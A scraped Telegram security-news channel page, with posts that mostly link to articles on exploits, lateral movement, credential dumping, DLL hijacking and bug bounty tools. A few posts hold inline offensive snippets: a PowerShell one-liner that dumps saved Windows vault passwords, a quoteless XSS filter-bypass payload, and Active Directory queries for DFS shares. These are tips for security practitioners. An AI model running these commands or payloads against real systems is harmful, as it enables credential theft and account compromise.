Information Security – Telegram

Information Security

420 subscribers

157 photos

5 videos

9 files

2.28K links

Information Security News

we are @sec_nerd twin brother

Download Telegram

About

Blog

Apps

Platform

Information Security

420 subscribers

Information Security

https://twitter.com/ShMalav/status/1247742279999078400

Malav Sharma (Wolfdroid)

A map of how DNS works.....

128 views13:54

Information Security

https://0x00sec.org/t/exploit-development-the-magic-in-hacking/20349

0x00sec - The Home of the Hacker

Exploit Development - The Magic in Hacking

The Magic in Hacking While wandering around the various amazing topics in this forum, I noticed a lack of one of the subjects I enjoy the most - exploit development (last post was more than a month ago). I decided to write my own post about the subject which…

128 views13:57

Information Security

https://github.com/thelinuxchoice/evilreg

129 views14:00

Information Security

Self-reminder - finding DFS shares

AD
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=a,DC=b" | select name

ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,dc=a,dc=b"; $s.FindAll() | % {$_.properties.name}

128 views09:23

Information Security

https://homjxi0e.wordpress.com/2018/02/15/lateral-movement-using-internetexplorer-application-object-com/

Lateral Movement Using internetexplorer.Application Object ( COM )

introduction Use Object COM ( InternetExplorer.Application ) For Execute using Types Exploit-internet Explorer For Execute ==> in Add On Internet Explorer For Get Execute Code using Lateral Move…

127 views09:49

Information Security

quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params

Normal:
/page?x=1&y=2&z=3
Downwards arrow

<body onload="func('1', '2', '3')">

XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow

<body onload="func('1', '\', ');alert(1);//'">

130 views10:03

Information Security

https://www.hackingarticles.in/credential-dumping-sam/

Hacking Articles

Credential Dumping: SAM

Learn how attackers dump credentials from the Security Account Manager (SAM) and how to prevent such attacks in your Windows environment.

134 views10:06

Information Security

https://mazinahmed.net/blog/ohmyzsh-dotenv-rce/

OhMyZsh dotenv Remote Code Execution

OhMyZsh dotenv RCE

157 views12:47

Information Security

https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e

Windows Privilege Abuse: Auditing, Detection, and Defense

Privileges are an important native security control in Windows. As the name suggests, privileges grant rights for accounts to perform…

126 views17:42

Information Security

Dump local Creds

PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }

#redteam #pentest

134 views18:12

Information Security

#bugbounty Tools

https://github.com/milo2012/pathbrute
https://github.com/lc/subjs
https://github.com/KathanP19/gaussrf
https://github.com/stevemcilwain/quiver
https://github.com/proabiral/inception
https://github.com/Broly157/auto.sh
https://github.com/codingo/crithit
https://github.com/vortexau/dnsvalidator
https://github.com/theblackturtle/fprobe
https://github.com/reconness/reconness

#bugbountytips

GitHub - milo2012/pathbrute: Pathbrute

Pathbrute. Contribute to milo2012/pathbrute development by creating an account on GitHub.

150 views18:29

Information Security

https://ophirharpaz.github.io/2020/04/09/how-does-ssh-port-forwarding-work.html

How Does SSH Port Forwarding Work?

I often use the command ssh server_addr -L localport:remoteaddr:remoteport to create an SSH tunnel. This allows me, for example, to communicate with a host that is only accessible to the SSH server. You can read more about SSH port forwarding (also known…

143 views12:22

Information Security

https://medium.com/@cyberdefecers/sudo-1-8-25p-a-tale-of-bufferoverflow-in-linux-cve-2019-18634-and-art-of-timing-attacks-in-web-bc6794407942

Sudo 1.8.25p:A tale of BufferOverflow in linux(CVE-2019–18634) and art of timing attacks in web applications

139 views15:42

Information Security

https://pentest.blog/how-to-test-horizontal-vertical-authorization-issues-in-web-application/

129 views19:50

Information Security

https://portswigger.net/web-security/access-control

portswigger.net

Access control vulnerabilities and privilege escalation | Web Security Academy

In this section, we describe: Privilege escalation. The types of vulnerabilities that can arise with access control. How to prevent access control ...

134 views20:07

Information Security

#CTF-wiki
https://t.co/HwOeDcUucI
PHP Code Auditing
https://t.co/aROQudgixZ
SQL Injection
https://t.co/avPQVgn3NV
XSS
https://t.co/TOpQCYaLXX
CSRF
https://t.co/cH1AyeFL1c
SSRF
https://t.co/65MuJ595Y4

#bugbounty,#bugbountytips

ctf-wiki.github.io

PHP Code Auditing - CTF Wiki

169 views20:14

Information Security

https://wpvulns.com/

144 views21:11

Information Security

http://bounty.offensiveai.com/

136 views06:01

Information Security

https://spyse.com/

139 views06:07

Information Security

https://itm4n.github.io/windows-server-netman-dll-hijacking/

Windows Server 2008R2-2019 NetMan DLL Hijacking

What if I told you that all editions of Windows Server, from 2008R2 to 2019, are prone to a DLL Hijacking in the %PATH% directories? What if I also told you that the impacted service runs as NT AUTHORITY\SYSTEM and that the DLL loading can be triggered by…

132 views11:38